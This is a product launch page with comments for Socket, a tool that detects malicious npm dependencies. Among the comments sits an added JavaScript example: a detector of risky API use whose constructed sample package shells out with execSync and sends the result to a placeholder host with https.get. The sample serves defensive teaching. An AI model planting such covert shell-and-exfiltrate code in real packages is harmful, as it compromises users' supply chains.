Feross Aboukhadijeh

Socket - Secure your JavaScript supply chain

Depend on Socket to protect your app from malicious dependencies lurking in your open source supply chain. Block 60+ red flags in open source code, including malware, typo-squatting, hidden code, misleading packages, and more.

Hyperamp
Love to see it!
Virus Cafe
Hyperamp
@viruscafe ❤️❤️❤️❤️
Feross Aboukhadijeh
🤩 Exciting news! I'm ready to share the project I've been working on for the past 7 months! ✨

⭐️ Socket – Secure your JavaScript supply chain ⭐️

We are a team of open source maintainers with over ✨ 1 billion monthly downloads ✨ to our names. Working on the frontlines of open source, we have witnessed firsthand how supply chain attacks have swept across our communities and damaged trust in open source. From npm to PyPI, and Rubygems to Cargo, no ecosystem has been spared. 🔥🔥🔥

Over the past decade, open source software has eaten the world. Sharing code freely has made it drastically cheaper and faster to build software – and tech innovation has accelerated as a result. But security has often been an afterthought. New technology spreads because it's useful, not because it's safe. In 2021, we witnessed an 📈 unprecedented growth 📈 in the scale and scope of open source supply chain attacks. Criminals are taking advantage of the trust in open ecosystems to carry out brazen attacks and spread destructive malware. 💥 The attacks keep on coming and they seem to be accelerating.

== What does Socket do? ==

We are taking an entirely new approach to one of the hardest problems in security in a stagnant part of the industry that has historically been obsessed with just reporting on known vulnerabilities. Socket is unique because, unlike other tools, it detects and blocks supply chain attacks before they strike, mitigating the worst consequences:

⚡️ Supply Chain Attack Prevention: Prevent compromised or hijacked packages from infiltrating your supply chain by monitoring dependency changes in real-time.
⚡️ Detect Suspicious Package Behavior: Detect when dependency updates introduce new usage of risky APIs such as network, shell, filesystem, etc.
⚡️ Comprehensive Protection: Block 60+ red flags in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Today, our early customers are using Socket to protect their apps from typo-squatting attacks using. If you're interested in trying out Socket, you can install the GitHub App in less than 2 minutes. Feel free to reach out to us at contact@socket.dev as well if you'd like to chat and get a more in-depth demo.

Read more in our launch post here: https://socket.dev/blog/introduc...
Here's a much longer deep dive into the problem of supply chain security: https://socket.dev/blog/inside-n...
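The "new usage of risky APIs" check described in the comment above, reduced to a toy. This is an added example, not Socket's code: it diffs which Node.js capability families (shell, network, filesystem, eval, env) two versions of a package's source touch, so a release that quietly grows new permissions stands out. The two package sources are constructed for the example.

```javascript
// Capability families and the source patterns that indicate their use.
// Pattern list is illustrative, not exhaustive (an assumption of this example).
const RISKY_APIS = {
  shell: [/require\(\s*['"]child_process['"]\s*\)/, /from\s+['"]child_process['"]/],
  network: [/require\(\s*['"](?:net|http|https|dgram)['"]\s*\)/, /\bfetch\s*\(/],
  filesystem: [/require\(\s*['"]fs(?:\/promises)?['"]\s*\)/, /from\s+['"]fs(?:\/promises)?['"]/],
  eval: [/\beval\s*\(/, /\bnew\s+Function\s*\(/],
  env: [/\bprocess\.env\b/],
};

// Return the set of capability families referenced anywhere in a package's source.
function capabilitiesOf(source) {
  const found = new Set();
  for (const [family, patterns] of Object.entries(RISKY_APIS)) {
    if (patterns.some((re) => re.test(source))) found.add(family);
  }
  return found;
}

// Families the new version uses that the old version did not ("permission creep").
function newCapabilities(oldSource, newSource) {
  const before = capabilitiesOf(oldSource);
  return [...capabilitiesOf(newSource)].filter((f) => !before.has(f)).sort();
}

// Constructed sample: v1 is a pure string helper with no risky API usage.
const V1 = `
module.exports = function pad(s, n) { return String(s).padStart(n); };
`;

// Constructed sample: v2 keeps the helper but now shells out and phones home,
// behaviour a reviewer would want flagged before the update is merged.
const V2 = `
const { execSync } = require('child_process');
const https = require('https');
module.exports = function pad(s, n) { return String(s).padStart(n); };
const rev = execSync('git rev-parse HEAD').toString().trim();
https.get('https://example.invalid/ping?rev=' + rev);
`;

// Usage: list the capabilities v2 introduces relative to v1.
console.log('new capabilities in v2:', newCapabilities(V1, V2));
```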
John Hiesey
Building this has been a lot of fun, and it's already my favorite tool for browsing npm packages. It's great to see the exact published code in my browser with inline issues and links!
Feross Aboukhadijeh
@jhiesey Really happy that we're finally launched! ❤️
Bret Comnes
npm has long lacked a tool to introspect what is actually going on inside of your node_modules folder. It's been great to help build a tool that gives me the types of research and analysis tools that I always needed to understand my dependency tree, as well as offer up useful features that I always wish the npm website had itself. Happy to answer any questions and I'm really excited to see what you think of the direction Socket is headed in!
Feross Aboukhadijeh
@bret_comnes I love that we shipped the File Explorer. It's sooooo handy! ⭐️
HifiWifi
Love this team, love the product. Keep it up!
Feross Aboukhadijeh
@hifiwifillc Thank you! 💪 💪 💪
Mikola Lysenko
I'm excited to get v1 out! Already socket.dev is useful for exploring JavaScript dependencies, and it's only going to get better as we keep building out more features. But npm users beware! You may find some really gross things hiding in your node_modules folder once you start looking closely.
Feross Aboukhadijeh
@mikola_lysenko Indeed! Can't wait to find more malware and help to clean up everyone's node_modules folders 😉
FreeTheFeross
Impressed at @SocketSecurity launch. Their tool keeps your app safe even in the worst case scenario of an active supply chain attack in an NPM package.
Piotr Pawłowski
Congrats on your launch! I will definitely check this!
Feross Aboukhadijeh
@piotr_pawlowski Thank you Piotr! ❤️
𝔥𝔶𝔭𝔢𝔯𝔪𝔬𝔡𝔲𝔩𝔢𝔰
Do I know what is in my node_modules? No I don't. And I don't have a chance in hell to audit everything in there by hand. Looks like a super solid start on long needed tools to find where all the bodies are buried.
Feross Aboukhadijeh
@hypermodul_es Indeed! It's not possible to audit all your open source dependencies by hand. Glad that Socket can help!
Wormhole
Detecting supply chain attacks by analyzing dependency behavior is such a refreshingly obvious idea once you see it in action.
WebTorrent
Awesome product. Awesome customers. Awesome team. We've deployed Socket to our whole GitHub organization – love their product + take on supply chain security for us/the world!
Tomas Antonok
Good job, upvote this!
Feross Aboukhadijeh
@antovtok Thank you Tomas!
Standard JS
We use Socket to protect the StandardJS GitHub organization.
Socket Security
Proud to launch Socket today ❤️❤️❤️
Prachi Yadav
@jhiesey @bret_comnes Love the product.. great job!! congrats 👍🚀
Basharath
Nice one.
Feross Aboukhadijeh
@basharath Thank you Basharath!
Nikita Kukreja
Awesome, congrats!!
Yakubu Yusuf Tambaya
Great product. I'd like to see you add more useful features. I can't list what features, but I feel a sense of importance if you'll add more valuable features.
Feross Aboukhadijeh
@yytambaya We'll work on it! Let us know if you have any suggestions!
Kiko Beats
This is insane, thanks for this @feross!
Feross Aboukhadijeh
@kikobeats Thanks!!! ❤️❤️❤️
Pranav Teegavarapu
This is amazing!!
Feross Aboukhadijeh
@pranavnt Thank you Pranav!